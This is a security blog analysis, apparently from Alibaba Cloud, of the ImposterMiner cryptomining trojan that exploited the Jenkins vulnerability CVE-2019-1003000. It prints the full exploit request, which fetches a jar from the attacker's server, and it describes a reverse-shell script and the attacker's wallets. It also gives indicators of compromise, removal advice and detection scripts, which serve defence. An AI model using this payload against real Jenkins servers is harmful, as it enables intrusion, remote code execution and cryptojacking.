ImposterMiner Trojan Takes Advantage of Newly Published Jenkins RCE Vulnerability

By Fan Wu and Fengwei Zhang

Introduction

“The wave of mining trojans does not stop in 2019, and this blog post presents the latest example. ImposterMiner takes advantage of a vulnerability in Jenkins, the world’s most popular CI tool, to compromise hosts, and then uses them for crypto-mining and other malicious purposes.

More than just another example of mining trojans, ImposterMiner also teaches us a valuable lesson: all of us, whitehats, blackhats, greyhats, read the same blogs, interact on the same forums, follow the same Twitter profiles, and are eventually exposed to the same published vulnerabilities. This means that once a security expert, a whitehat, reports on a new vulnerability, it makes all of us well informed, but it also instantly entices attackers to take advantage of a fresh attack vector. In this reality, organizations need to act upon a publication of a vulnerability with the same urgency they treat an actual attack.

Until that happens, please enjoy reading this in-depth analysis of the ImposterMiner Trojan.”

Yohai Einav

Principal Security Researcher, Alibaba Cloud Security Innovation Labs

Overview

The attacker directly copied the payload from the Jenkins vulnerability write-up on the blog of security researcher Orange.tw. The payload itself contains the string “orange.tw”, which may mislead security researchers into believing it is innocent. We have therefore named the Trojan “ImposterMiner”.

The most interesting things about ImposterMiner are these: first, it broke out only two days after the Jenkins vulnerability exploitation method was published; second, the attacker implants the trojan directly onto hosts through a web vulnerability, and the trojan does not spread itself further. These characteristics are similar to those of the “watchbog” mining Trojan, which leveraged a vulnerability in Nexus Repository Manager 3.

In this article we analyze the structure of the ImposterMiner mining Trojan and provide security suggestions on removal and prevention of similar events.

What Is ImposterMiner Trojan?

The figure above shows the infection process of the ImposterMiner Trojan. The attacker first attacks the Jenkins service on vulnerable hosts, using the following payload:

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile? value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27orange.tw%27,%20root=%27http://45.55.211.79/%27)%0a@Grab(group=%27tw.orange%27,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1

Host:【victim_host】:【jenkins_port】

The attack vector we see here is an obvious copy of the one described in a blog post by “Orange.tw” (the security researcher who discovered this vulnerability); if you need proof, read the payload carefully. In addition, the payload contains the acronym “poc” (Proof of Concept), which may deceive security researchers into believing that this is a harmless test of the vulnerability rather than an actual attack.

The payload exploits a Jenkins RCE (Remote Command Execution) vulnerability (CVE-2019-1003000), instructing the victim host to retrieve a jar file from http://45.55.211.79/tw/orange/poc/8/poc-8.jar and execute it locally.
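A defender-side check for the request pattern above, added here as an example that is not part of the original article: it parses access-log lines, URL-decodes the checkScriptCompile `value` parameter and flags requests carrying Grape (@Grab) annotations, pulling out the resolver root the jar would be fetched from. The log format is a simplified combined-log format and the sample lines are constructed (the source IP 198.51.100.23 is a placeholder; the resolver root is the one from the article).

```python
"""Detect ImposterMiner-style CVE-2019-1003000 probes in Jenkins access logs.
Added example, not from the original article. The log lines are constructed
in a simplified combined-log format; real Jenkins or proxy logs differ."""
import re
from urllib.parse import unquote, urlsplit

# Endpoint abused by the public PoC that ImposterMiner copied verbatim.
VULN_PATH_SUFFIX = "CpsFlowDefinition/checkScriptCompile"
# Grape annotations that make Jenkins fetch and load a remote jar.
GRAB_MARKERS = ("@GrabResolver", "@Grab(", "@GrabConfig")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]*)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
ROOT_RE = re.compile(r"root\s*=\s*['\"]([^'\"]+)['\"]")

def analyse_line(line):
    """Return a finding dict for a request matching the exploit pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith(VULN_PATH_SUFFIX):
        return None
    # Pull the raw 'value' parameter and decode it (%27 -> ', %0a -> newline, ...).
    q = re.search(r"(?:^|&)value=([^&]*)", url.query)
    script = unquote(q.group(1)) if q else ""
    markers = [mk for mk in GRAB_MARKERS if mk in script]
    if not markers:
        return None  # checkScriptCompile alone is legitimate Jenkins UI traffic
    root = ROOT_RE.search(script)
    return {
        "src_ip": m.group("ip"),
        "status": int(m.group("status")),
        "markers": markers,
        "resolver_root": root.group(1) if root else None,  # where the jar is fetched from
    }

def scan(lines):
    """Run analyse_line over an iterable of log lines and return the findings."""
    return [f for f in (analyse_line(l) for l in lines) if f]

# Constructed sample log: two benign requests, one probe using the article's payload.
SAMPLE_LOG = [
    '10.0.0.7 - - [09/Mar/2019:10:01:02 +0000] "GET /login HTTP/1.1" 200 5120',
    '10.0.0.7 - - [09/Mar/2019:10:01:09 +0000] "GET /job/build/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=println%20%22hi%22 HTTP/1.1" 200 12',
    '198.51.100.23 - - [09/Mar/2019:10:02:44 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27orange.tw%27,%20root=%27http://45.55.211.79/%27)%0a@Grab(group=%27tw.orange%27,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with status 200 from an unauthenticated source means the instance accepted the script for compilation; on a patched Jenkins the same request should be rejected, so both the status and the resolver root are worth forwarding to the SOC.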

The poc-8.jar contains the following code:

The n2.sh script requested from http://45.55.211.79/.cache/jenkins/n2.sh creates the /tmp/.scr folder and downloads s.tar.gz:

Decompressing s.tar.gz produces the folder shown in the left figure below. The “go” script is executed to run either “i686” or “x86_64”, according to the bit-length (architecture) of the current machine.

Both “i686” and “x86_64” are xmrig variants that mine Monero at nanopool.com (the world’s largest Bitcoin mining pool). They also add a scheduled task to crontab that runs every minute:

In addition, the 45.55.211.79 server holds a variety of payloads. Some have been previously used, while others have not.

For example, on March 7, the Alibaba Cloud Security team observed the attacker using a similar payload to execute poc/5/poc-5.jar on a victim host. The code in poc-5.jar instructs the victim host to download and run the Tsunami Trojan, which receives commands over IRC and launches various attacks.

Another example is http://45.55.211.79/.cache/jenkins/jen.pl, a file stored on the attacker's server, which sends a reverse shell to 190.121.18.164:1090:

The modification dates of the malicious files mentioned above indicate that the author of ImposterMiner is still updating them frequently. The content of these files also suggests that the author is not satisfied with merely mining on victim hosts: he is ready to use them as DDoS zombies, or to control them arbitrarily through a shell.

Scope of Impact

ImposterMiner Attack trend, compromised instances by day

The current wallet address of the ImposterMiner malicious mining Trojan is: 42X5Nwfs6kPcK5xZaV1mxnLpSqYst9d46Dx63tdtmHFZWdWPryNt5ZhZXFXLYm2yZLZt7xXC5zerGbqQi2X1MsTzA9whw2X

The hashrate of this address fluctuates drastically, reaching up to 236 KH/s according to data on the mining pool website. The average hashrate is around 150 KH/s, indicating that 10,000 to 20,000 servers may have been infected and used for mining. The cumulative revenue of the wallet address is about 169 Monero (9,120 US dollars).

In addition to the above address, the attacker has also used the following wallet address: 4B6GzzkQBgqbMraFa2FMnk4jKzFvxcqGNApKn6AK91R6KFgiWDKzhgWS864egV4HuHetns7yfYP9NDq234yxfNKEJWR4ga5.

Security Recommendations

Potential profits result in

Jenkins vulnerabilities offer great incentive for attackers, and they tend to move quickly when a new exploit is published. This time, the Jenkins RCE (CVE-2019-1003000) was exploited to implant miners only two days after the vulnerability was made public, posing a great threat to Jenkins users.

Alibaba Cloud Security provides the following suggestions for removal and further prevention of security incidents similar to ImposterMiner:

  1. Users are advised to upgrade software as soon as newer versions become available, in order to avoid attacks and mining events like the ImposterMiner mining Trojan. ImposterMiner not only attacks Jenkins, but also compromises other parts of the production system. If you suspect a host has been infected by ImposterMiner, check whether the malicious directory /tmp/.scr exists on the host, clear the /tmp directory, use the ps command to check whether a malicious process named “-bash” exists, and clear the crontab files.
  2. Use the Next Generation Cloud Firewall products provided by Alibaba Cloud Security to block requests to malicious domains and configure intelligent policies to defend against intrusions. Even with advanced obfuscation techniques, a mining attack still needs to download its payload, mine, and send a reverse shell, all of which require requests to other hosts; intercepting these requests with the cloud firewall therefore breaks the whole attack chain. In addition, you can use custom policies to block malicious websites based on your own circumstances.
  3. Users with customization requirements may consider Alibaba Cloud Managed Security Service. Experienced security experts will help customize solutions suitable for you, reinforce the system, and prevent intrusions. If an intrusion has already occurred, they can also assist in cleaning up systems and tracing attacks. This service is suitable for users with higher security requirements, and for enterprises that have not hired security engineers but want to ensure system security.
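The host checks in recommendation 1 (the /tmp/.scr directory, a fake “-bash” process, and a crontab entry) written as a small triage script, added here as an example that is not part of the original article. The ps and crontab samples are constructed (the article does not show the real cron line), and the CPU threshold used to tell a miner from a real login shell is our own heuristic, not the article's.

```python
"""Host triage for the ImposterMiner indicators in the recommendations above (added
example, not from the article; samples are constructed, CPU threshold is our own)."""
import os
import re

MALICIOUS_DIR = "/tmp/.scr"   # dropped by n2.sh, per the article
FAKE_NAME = "-bash"           # name the miner process hides behind
CPU_THRESHOLD = 50.0          # a login shell idles; a miner pegs a core (assumption)
CRON_EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(?P<cmd>.+)$")

def suspicious_processes(ps_output):
    """From 'ps -eo pid,user,pcpu,args' text, return (pid, user, pcpu) of '-bash' processes burning CPU."""
    hits = []
    for line in ps_output.strip().splitlines()[1:]:   # skip header row
        fields = line.split(None, 3)
        if len(fields) == 4 and fields[3].split()[0] == FAKE_NAME and float(fields[2]) >= CPU_THRESHOLD:
            hits.append((int(fields[0]), fields[1], float(fields[2])))
    return hits

def suspicious_cron_entries(crontab_text):
    """Return crontab lines that run every minute and launch something from /tmp (the article's persistence pattern)."""
    hits = []
    for line in crontab_text.splitlines():
        m = CRON_EVERY_MINUTE.match(line.strip())
        if m and "/tmp/" in m.group("cmd"):
            hits.append(line.strip())
    return hits

def triage(ps_output, crontab_text, scr_dir=MALICIOUS_DIR):
    """Combine the three checks from the recommendations into one verdict."""
    f = {"scr_dir_present": os.path.isdir(scr_dir),
         "fake_bash": suspicious_processes(ps_output),
         "cron": suspicious_cron_entries(crontab_text)}
    f["infected"] = bool(f["scr_dir_present"] or f["fake_bash"] or f["cron"])
    return f

# Constructed samples standing in for `ps -eo pid,user,pcpu,args` and `crontab -l` output.
SAMPLE_PS = """  PID USER     %CPU COMMAND
 2431 alice     0.0 -bash
 2780 jenkins  97.5 -bash
 2790 jenkins   0.3 java -jar /usr/share/jenkins/jenkins.war
"""
SAMPLE_CRON = """# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /tmp/.scr/go >/dev/null 2>&1
"""

if __name__ == "__main__":
    print(triage(SAMPLE_PS, SAMPLE_CRON))
```

On a live host, feed the output of `ps -eo pid,user,pcpu,args` and `crontab -l` (for every user, root included) into `triage`; the process running as the Jenkins service account is the one to expect.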

IOC

4B6GzzkQBgqbMraFa2FMnk4jKzFvxcqGNApKn6AK91R6KFgiWDKzhgWS864egV4HuHetns7yfYP9NDq234yxfNKEJWR4ga5

42X5Nwfs6kPcK5xZaV1mxnLpSqYst9d46Dx63tdtmHFZWdWPryNt5ZhZXFXLYm2yZLZt7xXC5zerGbqQi2X1MsTzA9whw2X

Mining pool address:

https://www.supportxmr.com

https://xmr.nanopool.org

Malicious program:

File name                  md5
x86_64 (tsunami backdoor)  1700ecbd3bddfab4979fbba416310eb0
i686 (tsunami backdoor)    580f0dfc85a4c0e368e162cef38d3c08
mx86_64 (miner)            a8d2d7f65c78ab724c987971fbdba5f0
mi686 (miner)              9b961a26561ba2f49733603395d8275e
x86_64 (miner)             dadd63b075f9485113a010569b88cb91
i686 (miner)               ac0a6e081ae917c65ee3ae7555cdfac0

Malicious URL:

http://45.55.211.79/.cache/jenkins/*

http://45.55.211.79/tw/orange/poc/*

Malicious host:

190.121.18.164


Reference: https://www.alibabacloud.com/blog/imposterminer-trojan-takes-advantage-of-newly-published-jenkins-rce-vulnerability_594729?spm=a2c41.12821067.0.0
